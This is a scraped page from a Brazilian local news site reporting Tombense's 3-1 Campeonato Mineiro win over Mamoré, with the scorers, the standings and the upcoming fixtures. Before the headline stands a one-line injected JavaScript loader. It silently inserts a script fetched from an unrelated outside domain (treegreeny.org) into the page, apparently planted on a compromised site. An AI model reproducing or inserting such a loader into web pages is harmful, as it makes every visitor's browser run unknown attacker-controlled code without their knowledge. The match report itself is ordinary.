;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tombense bate Mamoré dentro de casa e conquista primeira vitória no Mineiro. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Tombense bate Mamoré dentro de casa e conquista primeira vitória no Mineiro.

Depois de um início ruim, o Tombense venceu a primeira no Campeonato Mineiro. Na tarde deste sábado, a equipe de Tombos jogou em casa e derrotou o Mamoré por 3 a 1, pela 4ª rodada do Estadual. Os gols dos anfitriões foram marcados por Alexandre, Daniel Amorim e Joilson. Marco Tiago descontou para os visitantes. Com o resultado, o Tombense assumiu provisoriamente a 6ª posição com quatro pontos. Já o Mamoré, aparece na 10ª colocação com 3 pontos.
O Tombense começou a partida pressionando. Aos 17 minutos da primeira etapa, o zagueiro Alexandre aproveitou rebote da zaga e abriu o placar. Aos 27, o goleiro do Mamoré não segurou o chute de Betinho e Daniel Amorim completou para as redes: 2 a 0. Aos 34, Daniel Amorim foi derrubado por Gilberto na grande área e o árbitro assinalou pênalti. Joílson cobrou com categoria e ampliou a vantagem. Aos 30 da etapa final, Marco Tiago descontou para o Mamoré em cobrança de falta.
Na segunda-feira (02/03), o Tombense joga fora de casa contra o Boa Esporte, às 20h, no Estádio Municipal de Varginha. Já o Mamoré recebe o Villa Nova no próximo sábado, às 16h, em Patos de Minas.